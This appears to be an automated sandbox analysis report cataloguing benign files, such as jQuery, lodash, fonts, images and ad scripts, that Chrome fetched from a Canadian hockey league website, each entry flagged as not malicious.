                                                                                                                          Preview:var poll_id=0,poll_answer_id="",is_being_voted=!1;pollsL10n.show_loading=parseInt(pollsL10n.show_loading);pollsL10n.show_fading=parseInt(pollsL10n.show_fading);.function poll_vote(b){jQuery(document).ready(function(a){is_being_voted?alert(pollsL10n.text_wait):(set_is_being_voted(!0),poll_id=b,poll_answer_id="",poll_multiple_ans_count=poll_multiple_ans=0,a("#poll_multiple_ans_"+poll_id).length&&(poll_multiple_ans=parseInt(a("#poll_multiple_ans_"+poll_id).val())),a("#polls_form_"+poll_id+" input:checkbox, #polls_form_"+poll_id+" input:radio, #polls_form_"+poll_id+" option").each(function(b){if(a(this).is(":checked")||a(this).is(":selected"))0<poll_multiple_ans?..(poll_answer_id=a(this).val()+","+poll_answer_id,poll_multiple_ans_count++):poll_answer_id=parseInt(a(this).val())}),0<poll_multiple_ans?0<poll_multiple_ans_count&&poll_multiple_ans_count<=poll_multiple_ans?(poll_answer_id=poll_answer_id.substring(0,poll_answer_id.length-1),poll_process()):0==poll_multiple_ans_count?(set_is_being
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):774
                                                                                                                          Entropy (8bit):5.2757358714980915
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:UNmF3O6ZRoT6pfD3DhKa+zb77kYYtJcb65wCgDrqAF3O6ZRoT6pfDZfKayVVey9+:33OYs2ztJc+u/r3OYsPwy96cGSSf7
                                                                                                                          MD5:DE52D8255B9A8A5D8F4DBDB55AF60E31
                                                                                                                          SHA1:FD3AF6384F2B84C5E7D0CA1A555CEE50D46ADB99
                                                                                                                          SHA-256:52D62465D244BEF9C22960BED269D931EB2B705DFF7F09A0BCF5DDBA62554F45
                                                                                                                          SHA-512:76FE9AC96244CFDCEA6349CF3A10C50D593AAEB5CCFAF07B9DFC9705D58E7BFB125D6AB4AF31729F8D079F8E573136A17ACB0035551BE401EF0F60F95ABD9B10
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://fonts.googleapis.com/css?family=Lato
                                                                                                                          Preview:/* latin-ext */.@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjxAwXjeu.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXg.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 6217
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2705
                                                                                                                          Entropy (8bit):7.915735546000415
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Xez4p83xGJUxhNTHCfaRyRYI4hCBKr9QgH7BsCxMyhS33ha:YZGwhNToaRHIul9QgH7Be30
                                                                                                                          MD5:2DD0D317A9C22DA28252DCEC3F2C18FE
                                                                                                                          SHA1:795C64173C4912FB5AC3C90B40DB086CD01E341C
                                                                                                                          SHA-256:FABC284B7AE03CE9179D8791E064C2C73F2868D65ADB76DE767528F9B5DCC11F
                                                                                                                          SHA-512:CF42553588C6E5BB87B483DA0D7C6350429FD0AA1E83BA91A3107FA230A1B72B0275FF0129E49C1452971A22AAF26DBB4E0E243FD311058B746478C559C3E9F3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:...........Xms.6..~.B...Y....iK.....UwN....f|..M.l4...@%>Y...._m)ss3.#...<...U.r'...]PY.Ygd.YK.....v.\e...........E.:.a.5T.65..`...V.T.......^o."...G.>..?.Tap.D....+...)..Iw.Ys.;=.XDu.....^..y.b..a..M).g......|....R....*.... ......4..%....eJ.:).@.....%..].*...H*.2...o3G....u.....p...........X...b..^WV..q".....o...[..R....VkX...z.......RP....&.....R.KR..n.~.fj<.yZ.U.\.&.QdS..fT.+..H&.Z9.*...a.#...l|.......7d.}H......6..v.....\k..Wg......fTt...,q.g$.0.........Fd......k.Ui..p2e..0g.s.n'.D......m...@....+b..-;............H.MORxLe[y.9m.l..%[S.n@.."7...)...Z.....X..D.C.<{.._......Y4+..,........X.'. T......vn..].E|.T.5.T......*....d.Z..bK....4.._..%..S..ye.aGq.s..87...(....r}. TL...B;X:....7..$.F.....W...{...i.V.x.8.C..+.9..:.`..V...#J.;dS.F.O.lr2..d.h.H...2.#...t..0.v...G8...{.......... ...H.{ah..t .s........Jr4"0>....D.^........m...e+Y...Su....tz.gn.Xh...?.>..l......2.)....&.G"@.@..v.emL+g....L9..S.c9.f....9.d....l.!..h...t..Py.E..8)..Z.U..\/.sU$
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):838
                                                                                                                          Entropy (8bit):4.670822471754643
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2b7Ksen60AfVXF2ACfiVSApbE3zWlSabWH:C0A1gfMhG36YkWH
                                                                                                                          MD5:49CEA0A781874A962879C2CACA9BC322
                                                                                                                          SHA1:72C1650DE2B93EF320D2DB873FBB473FE360269C
                                                                                                                          SHA-256:57A50C99A31EF4E89E86664E96F6DFBDDE163A2EB96E88B3B492C49AA4BE2F37
                                                                                                                          SHA-512:7EBF5DA4637794CDAB0D199E8B0550E9230A1550804A4CE7FC723A8881E16D12327B9C40BCEECFF54ECE29DDE71BF41E63E8510ADF0827C4CD13C2392E6250A6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/plugins/latest_news/public/js/latest-news-public.js?ver=1.0.0
                                                                                                                          Preview:(function( $ ) {..'use strict';.../**.. * All of the code for your public-facing JavaScript source.. * should reside in this file... *.. * Note: It has been assumed you will write jQuery code here, so the.. * $ function reference has been prepared for usage within the scope.. * of this function... *.. * This enables you to define handlers, for when the DOM is ready:.. *.. * $(function() {.. *.. * });.. *.. * When the window is loaded:.. *.. * $( window ).load(function() {.. *.. * });.. *.. * ...and/or other possibilities... *.. * Ideally, it is not considered best practise to attach more than a.. * single DOM-ready or window-load handler for a particular page... * Although scripts in the WordPress core, Plugins and Themes may be.. * practising this, we should strive to set a better example in our own work... */..})( jQuery );.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 57x57, segment length 16, baseline, precision 8, 730x355, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):60211
                                                                                                                          Entropy (8bit):7.939964647392253
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:YpEtISXRarBnPypfrrspd1joGNcHJKFXHsiaKI:TfaRKpf8pSxH
                                                                                                                          MD5:7B142D0C22482E370C8144D20A1D80CF
                                                                                                                          SHA1:204CE546175A519ECDF9123756BD21E26DE4EEB3
                                                                                                                          SHA-256:7D8376F0F9AB732304781732A3CD53C32CDACEC36085D9F52DEF6F4EA8541FED
                                                                                                                          SHA-512:2F73CAD0A7BF72A3B6B8811052A561C5896698D52A33B3A16E24D2FCD295677D7FB7C8FB82739029BAB33570E8ECBE8700C30403448C4F99E1B04FCC66444709
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2022/10/31124110/SnacksToFuelPerformance-BreakoutFall2022-730x355.jpg
                                                                                                                          Preview:......JFIF.....9.9......ICC_PROFILE.......appl....mntrRGB XYZ .........%."acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt...P...#wtpt...t....rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt.......0ndin... ...>mmod...`...(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ.......0daDK.......FnlNL.......bfiFI.......xitIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW.......$viVN........skSK.......<zhCN.......$ruRU...$...RenGB.......vfrFR........ms..........hiIN........thTH........caES........enAU.......vesXL........deDE........enUS........ptBR........plPL......."elGR..."...4svSE.......VtrTR.......fptPT.......zjaJP.........L.C.D. .u. .b.o.j.i.... .L.C.D.F.a.r.g.e.-.L.C.D.L.C
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):530
                                                                                                                          Entropy (8bit):7.2576396280117494
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7OEUhUxzPKmghSn8nazyk+k8/OzxQcxNMvVb:bhUxzlvWkT8FcxK1
                                                                                                                          MD5:88E0F42C9FA4F94AA8BCD54D1685C180
                                                                                                                          SHA1:5AD9D47A49B82718BAA3BE88550A0B3350270C42
                                                                                                                          SHA-256:89C62095126FCA89EA1511CF35B49B8306162946B0C26D6F60C5506C51D85992
                                                                                                                          SHA-512:FAFF842E9FF4CC838EC3C724E95EEE6D36B2F8C768DC23E48669E28FC5C19AA24B1B34CF1DBCBE877B3537D6A325B4C35AF440C2B6D58F6A77A04A208D9296F8
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX...JBA.....E-R... (#..-*$.}.%.Kt.A..Dx.I...AF.Q.4.......-.6..?.m:.,.......Q..D.L..e4..2.D..8)j4:......&>.s......p?......9.o5>.][H.}...&L.%.xh{~K.J|.b..N..HMp....f.}dd..S..4%...$dK..!..Z..NNs.W&g..Fn....p...w..Ut...E\.e.......6......M.F...X.L......em.....R#'..%....j$/..-......@.l."..M.|....OtW.H.,.-.~W`Z.s8..W...B...C-.8"H....6......9...A..aO.1`.M..A..eA.{...-...U.,.W........IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 730x406, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):79992
                                                                                                                          Entropy (8bit):7.958150129532597
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:NLcqiIaaQPTjONuVQvmoltwgElYN5oB9RguRdsj9fMelDy77VCM8DeYOtsnT:N9ajwWQuvjOCXRq5fPlDy1CdDNO+nT
                                                                                                                          MD5:499C6DBAFD87888308901D2C585C3186
                                                                                                                          SHA1:1988974ABB1CB7096ABA04CCF6AEE1A4770564A7
                                                                                                                          SHA-256:61D2DBCA4D1766F10D8DC42916BACA97CB0A11AFC5F6A96187698A0B1E5A7A7B
                                                                                                                          SHA-512:1A7A0A27B23EA8F2DDC3CC5BE389BBC7C3D1267D3C6C8C41DE6126DCE994C4F6731D345027AFA76D9AE1AEE150DDC9E6682865DA1D209DD492967D7B4C9B2C44
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF..............ICC_PROFILE.......appl....mntrRGB XYZ .........*.&acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt.......#wtpt........rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt...<...0ndin...l...>mmod.......(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ........daDK........nlNL........fiFI........itIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW........viVN........skSK........zhCN........ruRU........enGB........frFR........ms..........hiIN........thTH........caES........enAU........esXL........deDE........enUS........ptBR........plPL........elGR........svSE........trTR........ptPT........jaJP.........E.S.-.2.4.X.3..text....Copyright Apple Inc., 2024..XY
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):107606
                                                                                                                          Entropy (8bit):7.968074633182128
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:L4zKV2qZPxg3x+d7JOgN8axXw7AE9Eiuhznvq9k:kKVbPg3xcOgtxGAE9En5x
                                                                                                                          MD5:B2EAE4C054996B0AF3FB67696E2F8D86
                                                                                                                          SHA1:F8C8870DA49034AD37306ED188DCF26E0E7F3DAC
                                                                                                                          SHA-256:7CD4ED50BE0D8298927786783E34A59D16893AF326021B33C0B9A51A8FE6E510
                                                                                                                          SHA-512:3B6BAE71BD48FCB1CD7D155367203750DE272D3FE813B74A817AF8DAC498F61BC14BD4CDD47BC37E26DF070A2BDB95EC43F11C56D47A6EBAE18050517BBCEE8C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/12194650/U10-AA-West-Mall-Lightning-GTHL-Community-2-730x411.jpg
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................".........................................P..........................!..1AQ"a..2q.#..BR..3b....$r..C.%Ss...4EU....Tc.......................................:.........................!.1A."Q.a.2q.....#3BR.....$S.rb............?..........UMBd!ZXrB.J@...+...%BUp-.."c.....z.%.JA.I@ .^.*...J..Fl2.2....r{k.n.x^.....RvWk}.'J.V..tRY%....,z..t.Ouo.l/.....fRdT.G.V..{....'e.B.X.:2.R..d.....W.|uN....R.V....C..-u^....r.Iq..........:.W>-...Q....:.Q..JB...IW.W......S0....&K......a.X.9Q...4.%E.fN......7.9...2Xa... .........M. ....O...t.J..}..n........UU.'..!...Xe..kq.@.T.M....JaH.d%-.B."..@\.CTd1.$". ....!.+'.....{.|.8.9..s+..n<.4..F...m......z~...J..~bOp....P'.O.G......+PmJO@OM...Q.....c..o..5........;.U....OM.....Jm.Z.bzc..R..X+..'...e.*V..".4...s.s.S...n0.....l....di.L.@.b......)..D%..|.......lX|,..#.YB
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (3533)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):222749
                                                                                                                          Entropy (8bit):5.453364917537705
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:Giwcm/IpG4DMcdc/Fa9BDrk7m7U7ozJgs:yP/I5jMI
                                                                                                                          MD5:ADB4D93F80755314547B699C181145BD
                                                                                                                          SHA1:87BBCFD9E29A8BBB0ED8177AEB0F930499592AB7
                                                                                                                          SHA-256:AF6B15D8917BD5AB039B73DB5F939C17DF1ACA2ACF7D4AC9D8F44A005EDAF6D6
                                                                                                                          SHA-512:39DD81FFB91A9340D97B77E689B06D7D45201511CDF44352F3F1406AC3FEEAF2B786ECF13F08ADD5F0725610ECC3F24B2E87D5A8518CC2818F765921A0CA626C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://pagead2.googlesyndication.com/pagead/managed/js/activeview/current/ufs_web_display.js
                                                                                                                          Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},da=.ca(this),p=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.p("Symbol",function(a){if(a)return a;var b=function(f,g){this.Lg=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.Lg};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):42
                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsvWmPVccC-aBxBQ9Pu8fcDTRgShqjln_OYhWW-zoQEsrrkdXeChR2GkXSe3sk91WAOMlasOph6jVA_RoXP7O7EXvYZ7J0l207KtrlI1828QrgaCc7ZXj5vKWLI48XvXPpG-G8ZCVMwRJbuWZve1o2TNpGt6zGRvxAEQ2h7OAWNSph-Dc41l6Zgh3RllqkjfCX85NA&sig=Cg0ArKJSzAjAp8pBye1pEAE&id=lidar2&mcvt=1001&p=559,1239,809,1539&tm=1019.9000000022352&tu=18.900000002235174&mtos=1001,1001,1001,1001,1001&tos=1001,0,0,0,0&v=20241204&bin=7&avms=nio&bs=1903,953&mc=1&vu=1&app=0&itpl=3&adk=739091630&rs=4&la=0&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTI4LjAuNjYxMy4xMjAiLG51bGwsMCxudWxsLCI2NCIsW1siQ2hyb21pdW0iLCIxMjguMC42NjEzLjEyMCJdLFsiTm90O0E9QnJhbmQiLCIyNC4wLjAuMCJdLFsiR29vZ2xlIENocm9tZSIsIjEyOC4wLjY2MTMuMTIwIl1dLDBd&vs=4&r=v&co=3273488300&rst=1736802082712&rpt=1209&isd=0&lsd=0&met=mue&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 730 x 432, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):574526
                                                                                                                          Entropy (8bit):7.99373281021127
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:/zWvFhgySZ7lvdi1tLh35lQqawK2TvA/WhKZQ:/zWN2/7lvOLnlQHwK0/SQ
                                                                                                                          MD5:16D1720F2D45A79A5C22E39358DEB46C
                                                                                                                          SHA1:34FFC049114374621E9CCA97252A8B59F2782EE8
                                                                                                                          SHA-256:27D4E7C51913182CB6F76E8FF85902EF16E8AB1DDBFE88AA53DF4F52D2D1D4E6
                                                                                                                          SHA-512:22FCE5698F422C49D5C0249EF590F65EAFDF20512F91E37DE415C2988050D9645E5890A207F383DC7420565209730BF82D7C4F2F359C3B0C85AB0161C8485351
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/03/14100611/Screen-Shot-2023-03-14-at-10.05.42-AM-e1678802821516-730x432.png
                                                                                                                          Preview:.PNG........IHDR..............i.....IDATx..I.%...}...Ow..#.{M5.D.....u..ZK$.&.kq.............ER.!V..&...&n....n.5.mf....|.%../#.=..........W......1../.cD......(..0.......o.....@..u..........._.>........v...8. ......C......9.../...l..0.1...+............/|..K....,..pt.....!0..~..8.8;;.G.}...c..`..3.......?..c..^\......_..@ ..{\]^.........3...)...!....#..O.....q...0......%n.nqrr.E.,.,.a.?.A...B.1`...X/..._..G.5~....Y....?`.Y.:...#Xk.Zm.......B.;I..?.........Y!........5...k8k0....X.W...D\^.Y.../....~....3#p@.ux..._~.%>..#..+03.........k.....?...{. .Yyo.9f..0......'g..................x.....w...........1.... . ......*...B.u.....`..!...n....x.....4 2`.v.=.?y......k..a...a....=...?._.'....o...?..;?...k....(..y.t.L\.. f..0....e?...=....1.......f..0c............O...|...)F6...c.Y.=.8Y..3........!0.3.|.~p}..@.>....9.0.......~.3|..%...._..~..\.^.X.T.E.........>.<...5,.Z....!~...~.?.g...z..............r.H.A.@F....`&.!..S....>c~.....q]....._............._
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 38812, version 1.0
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):38812
                                                                                                                          Entropy (8bit):7.993456187091619
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:IlehK+isKfKPJS7xGfaNtLsZFhHrek9MMzEVUrJdyWI1TrF5olqKP6PJ:+ehv5FPM7x5Bsl1NzE4JdyjclqH
                                                                                                                          MD5:3A7CBC4317A2F33F497608A07E633F7C
                                                                                                                          SHA1:5004B9E9405FE487B7CC55D3AB271AC70B3DD18B
                                                                                                                          SHA-256:8DE03245050E0FB0C9EB37D8D5525985B04711C40A53C3FCF55C3F07A9042559
                                                                                                                          SHA-512:44CFBF17042161690E15F4062315B5D52DDF5556E2A23AF853D8B918F7C4C20313A5906EFC9131995D173D6D3AD05F1171A43CFD1FE51DA5F3E85FFFE57B6506
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/fonts/Material-Design-Iconic-Font.woff2?v=2.1.0
                                                                                                                          Preview:wOF2...................:........................?FFTM....`..B..........P..2.6.$..*..X.. ..p..8..[.Cq..y..1.....Vq....Am.....^...............BFl..?x.._.*.*A...%...Mu.....).4\BMq....zC...tP.]5...e.j.L....c`..w}......A"..c.1..L. .AQ@....1I...y...:^9.}..B.....Y.4iM-..|....^s....r...>..eJ....0...o........5..........k..bV.2..O+...%.J7.*.N.<.k.|..g.`.....m\*.D]..M....y.-...q.9..6.G.....-..(.xi..ng....d2..........c....{.........9RK.r...e..eXZw...%..yS.y....M7[.e.....m....Os.E,..e......}V...v.dq...V..rV.f~t..d..l..l.......6s./fgIMT...a2.L}.......z.//.........E...#.,6w. .yH..<..X._.c..W..b..$...I.y.....U38h\.-.EB....3c.:...%.&...S...|0..}E.<.z..&...x'....oX..O.X|3.D.....Y0.[.UC76...9......vZ6.!H."f..<.f&n.......d.(.d).r.v..I......I..O.2.#.52X..]....F.k.e.Mr.`H.!.$...l.!..7......a..t'y...m.3.Ra....d.#/&...x.o.H.O.......7Q.L..:.........,...r\...&.O,f...;..z.w..88..<. " .2@..a......cd..L...9...<h.=)z.d.|....}.r....~...*>.@..IV..).n.,......P.y.;.*.l..^..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2239)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):50543
                                                                                                                          Entropy (8bit):5.286658880654905
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:N9bj01l4VlATb7k5VPRrJHDWBlT6LduiF+ndtp3NmjXsFZ/MHtsb:rj6WVZrt6v25atNDcHy
                                                                                                                          MD5:7629CAC4F079926EF505E2271BB5135F
                                                                                                                          SHA1:407E49EF5195FD899B2AF5BC74ECCF5A6232D89B
                                                                                                                          SHA-256:BF63C4491140DE87027557A7C15C741F65C83D98274347B105A06A20E05CE78D
                                                                                                                          SHA-512:E5CB0F5C9CBFF1D74E2465B678EBCFCD9EF2701E12CDA01B1ADB6F3B60BBED85B92922717F404F44EBDD9141C1E843E77E71F3533E75E4DB9D3AB374E5635289
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/themes/base/bower_components/lodash/lodash.min.js
                                                                                                                          Preview:/**. * @license. * lodash 3.10.1 (Custom Build) lodash.com/license | Underscore.js 1.8.3 underscorejs.org/LICENSE. * Build: `lodash modern -o ./lodash.js`. */.;(function(){function n(n,t){if(n!==t){var r=null===n,e=n===w,u=n===n,o=null===t,i=t===w,f=t===t;if(n>t&&!o||!u||r&&!i&&f||e&&f)return 1;if(n<t&&!r||!f||o&&!e&&u||i&&u)return-1}return 0}function t(n,t,r){for(var e=n.length,u=r?e:-1;r?u--:++u<e;)if(t(n[u],u,n))return u;return-1}function r(n,t,r){if(t!==t)return p(n,r);r-=1;for(var e=n.length;++r<e;)if(n[r]===t)return r;return-1}function e(n){return typeof n=="function"||false}function u(n){return null==n?"":n+""}function o(n,t){for(var r=-1,e=n.length;++r<e&&-1<t.indexOf(n.charAt(r)););.return r}function i(n,t){for(var r=n.length;r--&&-1<t.indexOf(n.charAt(r)););return r}function f(t,r){return n(t.a,r.a)||t.b-r.b}function a(n){return Nn[n]}function c(n){return Tn[n]}function l(n,t,r){return t?n=Bn[n]:r&&(n=Dn[n]),"\\"+n}function s(n){return"\\"+Dn[n]}function p(n,t,r){var e=n.leng
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (32077)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):97184
                                                                                                                          Entropy (8bit):5.373357406768198
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:GYE1JVoiB9JqZdXXe2pD3PgoIiulrUdTJSFk/zkZ4HjL5o8srOaS9TwD6b7/Jp97:t4J+R3jL5TCOauTwD6FdnCVQNea98Hrm
                                                                                                                          MD5:8610F03FE77640DEE8C4CC924E060F12
                                                                                                                          SHA1:076524186DBBDD4C41AFBBD6B260D9E46A095811
                                                                                                                          SHA-256:FC48D1D80ECE71A79A7B39877F4104D49D3DA6C3665CF6DC203000FB7DF4447E
                                                                                                                          SHA-512:10FE149F49675C81BDD7C9D8323E7C5C42FF587028DE0783ABD1C62CFCA8F34142A1CF34260F2C6CF601A507F599BD384C044409350EFB83D3EEF2326003F62F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/wp/wp-includes/js/jquery/jquery.js?ver=1.12.4
                                                                                                                          Preview:/*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="1.12.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.ca
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):15552
                                                                                                                          Entropy (8bit):7.983966851275127
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                                                                                                          MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                          SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                          SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                          SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
